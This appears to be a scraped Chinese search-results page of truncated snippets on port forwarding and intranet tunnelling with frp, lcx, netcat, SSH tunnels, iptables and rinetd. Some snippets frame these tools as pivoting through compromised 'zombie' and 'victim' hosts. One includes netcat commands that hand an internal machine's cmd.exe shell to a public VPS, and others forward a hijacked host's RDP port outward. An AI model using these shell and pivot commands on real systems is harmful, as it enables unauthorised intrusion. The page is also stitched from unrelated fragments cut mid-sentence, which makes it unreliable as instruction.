工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...= admin #HTTP代理端口 vhost_http_port = 10080 #HTTPS代理端口 vhost_https_port = 10443 然后运行....客户端 随后配置客户端编辑客户端配置文件 #服务器地址 server_addr = x.x.x.x #服务器绑定端口 server_port = 7000 #服务器连接密码 token = 12345678...#服务名称(自定义) [ssh] #转发协议类型 type = tcp #本地地址 local_ip = 127.0.0.1 #本地端口 local_port = 22 #远程端口 remote_port...此时frp隧道已经建立成功,可以通过访问vps的ip:7001就相当于访问了本地的22端口
工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...linux上的操作是一样的,更换几个命令即可
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...开门见山 lcx端口转发 前提是在端口转发的时候需要一台公网服务器,lcx是一款轻便的端口转发工具,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便...故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。 ?...127.0.0.1:1234; reDuh端口转发 reDuh也是一款内网渗透利器,这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。...山转一角 Linux一句话端口转发 我们在渗透测试中回经常遇见Linux主机环境,我们将获取到Linux主机的shell为内网渗透的工作之一,但有时候把并不是我们想象的那样简单,毕竟目标主机是处在内网环境中没有公网
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 -p1 -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 收到会话,随后使用xshell链接 ? ? ?
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP....tar.gz 2.3解压tar -zxvf frp_0.31.2_linux_amd64.tar.gz 文件夹改个名,方便使用 cp -r frp_0.31.2_linux_amd64 frp 把解压出来的文件夹复制到你想要的目录下...frp实际使用时,会按照端口号进行对应的转发, 上面frpc.ini的rdp、smb字段都是自己定义的规则,自定义端口对应时格式如下。 “[xxx]”表示一个规则名称,自己定义,便于查询即可。...“type”表示转发的协议类型,有TCP和UDP等选项可以选择,如有需要请自行查询frp手册。 “local_port”是本地应用的端口号,按照实际应用工作在本机的端口号填写即可。...:设置你在frpc.ini的[msf] remote_port = xxxx 只有通过服务器的xxxx端口数据包才能成功转发到我们的kali上来,这也是为什么要用frp反向代理原因。
今天说一说udp端口转发 Linux,Linux iptables 端口转发[通俗易懂],希望能够帮助大家进步!!!...准备: 1, UDP端口范围映射 2, tcp 端口范围映射 3, 本机端口转发 4, 单个端口转发 打开转发 [root@CentOS ~]# cat /etc/sysctl.conf | grep...9999, 目的端口是5500-5555 sudo nc -v -u -p 9999 172.16.20.183 5500-5555 端口转发双向通信验证: nat里面的机器打开监听: [root@CentOS...4, 单个端口转发 端口转发 tcp模式:将访问本机1122端口数据包转发给192.168.66.2:5566 iptables -t nat -A PREROUTING -p tcp --dport...1122 -j DNAT --to-destination 192.168.66.2:5566 端口转发 udp模式:将访问本机2233端口数据包转发给192.168.66.2:4455 iptables
端口转发和端口映射 目录 端口转发和端口映射 两者的区别 端口转发和端口映射 介绍端口转发和端口映射之前先了解两个概念:正向连接 和 反向连接 正向连接:你的机器连接目标机器 反向连接:目标机器反连你的机器...端口映射:端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。...在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全 端口转发:端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。...这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。...这就是端口转发,其转发一个端口收到的流量,给另一个主机 两者的区别 按理解意思,是用不同的方法实现同样的目标。 端口转发:你给我了,我打开看看,发现这上面标志显示是要给张三,那么我就给张三去。
Linux 端口转发...iptables 端口转发 iptables -t nat -A PREROUTING -d 114.114.114.114 -p tcp -m tcp --dport 3389 -j DNAT --...、转发的地址 、转发的端口 启动rinetd服务 rinetd -c /etc/rinetd.conf SSH ssh转发命令 本地执行建立隧道,通过本机端口访问内部主机 ssh -N -L 0.0.0.0...:888:192.168.10.1:55555 -p55555 root@192.168.10.1 -f #外网ssh访问转发主机888端口就可以连接到内网192.168.10.1; -L 本机端口...; proxy_connect_timeout 1s; proxy_timeout 3s; proxy_pass manager; } } # 通过nginx 9001端口可以访问内网
本文讲述了如何在Linux下实现端口转发,以实现通过V**连接至远端开放给V**连接的计算机后,如何通过该计算机代理访问远端内网中其它计算机。...情景是这样的,A公司给B公司开发了项目,之后需要对B公司的项目进行维护,而该项目是在B公司内网中才能访问的,A公司需要有办法能够连接到B公司才能对项目进行维护,因此,B公司管理员给A公司开放了V**,但是限制只能访问项目所在服务器...于是就有了下面的办法,用B公司开放的服务器做端口转发,将A公司对B公司数据库服务器的访问请求,通过开放服务器转发到数据库服务器,间接实现对数据库服务器的访问。...安装rinetd服务 http://www.boutell.com/rinetd/ 配置转发规则 vi /etc/rinetd.conf 规则内容为: 本机IP地址 本机端口A...A公司这边就可以通过访问该开放服务器的【端口A】实现对B公司数据库服务器的访问了。
也就能通过A访问B了 操作如下: #主机B执行(然后输入A的密码): ssh -R 6121:127.0.0.1:22 129.28.X.X -Nf 参数说明: -R 转发...6121 A服务器所要开启的端口 127.0.0.1 转发目标(本次测试是B主机,也可以换成B能访问到的其他主机,这样A就能通过B访问其它主机了) :22...转发目标的端口 -Nf 后台启用,不打开shell 2020-03-13_161918.png 测试:在A服务器上连接本地端口6121即可 #主机A执行(然后输入B的密码...-L lp:r:rp sshserver -Nf ssh 协议 -L [bind_address:]port:host:hostport lp 本地端口...r 远程地址 rp 远程端口 sshserver 用来做ssh转发的主机。
我们局域网的机器能够访问外网,但是外网不能访问内网。因为内网访问互联网时候能确定外网的地址,外网却不能确定我们局域网内的具体地址。...(ip地址有限)如果 我们在访问外网的时候,这个链接让他保持、不断,那么这个链接就相当于我们建了一条路,内网数据能出去,外网数据能进来,ssh也是这个方法。...首先在外网服务器上编辑sshd的配置文件 vim /etc/ssh/sshd_config #将GatewayPorts 开关打开 GatewayPorts yes 重启sshd服务,使用修改生效(linux...,反向代理 -L 将端口绑定到本地客户端,正向代理 -T 不为这个连接分配TTY -NT 代表这个SSH连接只用来传数据,不执行远程操作 保持ssh链接不断开 通常我们使用ssh 链接服务器的时候...ssh_config 选择其中一个就可以,添加下面参数 #每隔60秒向服务器发送一个空包 ServerAliveInterval 60 #如果超过两次没成功就断开 ServerAliveCountMax 2 #转发失败后退出
端口转发映射的程序叫rinetd,下载地址,直接manke编译安装即可。...要跳转的IP 要跳转的端口;在每一单独的行中指定每个要转发的端口。...源地址和目的地址都可以是主机名或IP 地址,IP 地址0.0.0.0 将rinetd 绑定到任何可用的本地IP地址上: 例如将所有发往本机80端口的请求转发到192.168.4.247的80端口...allow 0.0.0.0 #allow 10.15.44.* #deny 10.15.44.144 0.0.0.0 8090 10.15.44.133 80 // 设置端口转发...:123 & 在本地监听188端口,并将请求转发至192.168.1.22的123端口 TCP4-LISTEN:在本地建立的是一个TCP ipv4协议的监听端口; reuseaddr
客户提供的服务器只提供个http的80端口和https的443端口,其他端口不开放,但是我们的后台是8080启动的,访问需要代理转发 先找安装nignx的位置,找不到输入指令 whereis nginx...找nginx.conf配置文件 修改配置,https默认是443端口,监听443,然后设置代理server 8080端口。...index.htm; proxy_pass http://nginxDemo; } } 这样我们请求服务器接口地址填写https:// + ip,就会默认到服务器的443,然后再转发到...8080,也就是后台的端口,就能请求到接口了。...http的同理,默认是80端口,自己改80的配置就行,我这里就不修改了 修改完配置保存,然后重启nginx cd到nginx的sbin目录 然后输入指令重启 .
系统开启路由转发 echo 1 > /proc/sys/net/ipv4/ip_forward sysctl -p 2....nat(地址转换):IP地址或端口号转换,可以包含PREROUTING、OUTPUT、POSTROUTING 3个内置chain,nat table在会话建立时会记录转换的对应关系,同一会话的回包和后续报文会自动地址转换
:这里公网服务器B和内网服务器A都必须是Linux系统,才能建立SSH隧道 现在我们有这么一个环境,我们拿到了公网服务器B的权限,并通过公网服务器B进一步内网渗透,拿到了内网服务器A的权限。...我们可以将内网服务器A的22端口远程转发到公网服务器的1234端口。...:8888 localhost #意思就是将本地监听的1234端口的流量都转发给本地的8888端口 接着,在黑客机器C的操作,通过ssh公网服务器B的某个端口实现ssh内网服务器A的22号端口 ssh...端口,将流量转发到本地的8888端口,于是内网服务器A将本地的22号端口反向代理到了公网服务器B的8888端口,公网服务器B又将8888端口的流量转发到了本地的1234端口,所以黑客SSH连接到了内网服务器...在内网A机器上的操作: ssh -p 1234 root@100.100.10.12 #ssh连接到公网服务器的1234端口 参考文章:实战SSH端口转发 使用SSH反向隧道进行内网穿透
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...例:现在有一个ip为222.221.221.22的websehll.用端口扫描发现开放了3389端口 可是我们输入外网IP可是不能正常链接。那么很有可能就是内网服务器。...这样的就是内网服务器了。 上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。...肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave
所谓端口转发就是,本来你的进程是提供端口A的TCP服务,但是由于一些特殊原因(比如该端口禁止外网访问,或者金志明某些用户访问),如果还是想要访问到该端口A的服务,可以配置一下端口转发,使得到端口B的请求被自动转发到端口...首先,必须开启Linux的端口转发功能 我们进入配置文件: $ vim /etc/sysctl.conf 找到 net.ipv4.ip_forward = 0 这一行,如图改成 net.ipv4.ip_forward...现在就可以修改iptables,来做端口转发,也就是nat映射了。...OK ] $ service iptables restart Redirecting to /bin/systemctl restart iptables.service 三条命令的目的很明显:配置端口转发...以上,就是Linux的本机端口转发配置方法了,还有一种转发是跨IP端口转发,本文暂不介绍。
一、LCX lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap, lcx有两大功能: 1)端口转发(listen和...slave成对使用) 2)端口映射(tran) 1、lcx 内网端口转发 1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口 例如: lcx.exe...-slave 公网主机ip 4444 127.0.0.1 3389 把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口 2.公网主机 上执行 Lcx.exe –listen 公网主机端口.../portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777 意思是监听来自6666端口的请求,将其转发到7777端口 再在内网主机上执行: ....-v 详细模式 如果内网主机为Linux,则可以将22端口转发出来,更详细的使用方法请参考github上面的说明。
参数介绍 反向代理 ssh -fCNR 正向代理 ssh -fCNL -f 后台执行ssh指令 -C 允许压缩数据 -N 不执行远程指令 -R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口...-L 将本地机(客户机)的某个端口转发到远端指定机器的指定端口 -p 指定远程主机的端口 设置步骤 B上设置反向代理 建立A机器到B机器的反向代理,具体指令为 ssh -fCNR [A机器IP或省略]...ssh -fCNL *:20022:localhost:20122 localhost 在此20022端口为本地转发端口,负责和外网进行通信,并将数据转发的20122这个端口,实现了可以从其他机器访问的功能...在此-p参数为指定登陆的端口,我们在上面指定了20022端口为转发端口,故用20022端口登陆, 然后rootb是内网B机器的用户名, 123.123.123.123为外网A机器的IP地址。...自动启动autossh 在内网机器B上操作 最后配置在Linux上配置开机自动启动autossh,免去了重启Linux后要自己启动的autossh的麻烦 输入: vi /etc/rc.d/rc.local
本文主要记录 ssh 隧道使用 来进行内网穿透。使用 sockv5, 其效果和 ss 一样;仅仅使用ssh,putty 就能做到。...-L port:host:hostport 将本地机(客户机)的某个端口转发到远端指定机器的指定端口....可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口....可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口....只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发. -C Enable compression. 压缩数据传输。
领取专属 10元无门槛券
手把手带您无忧上云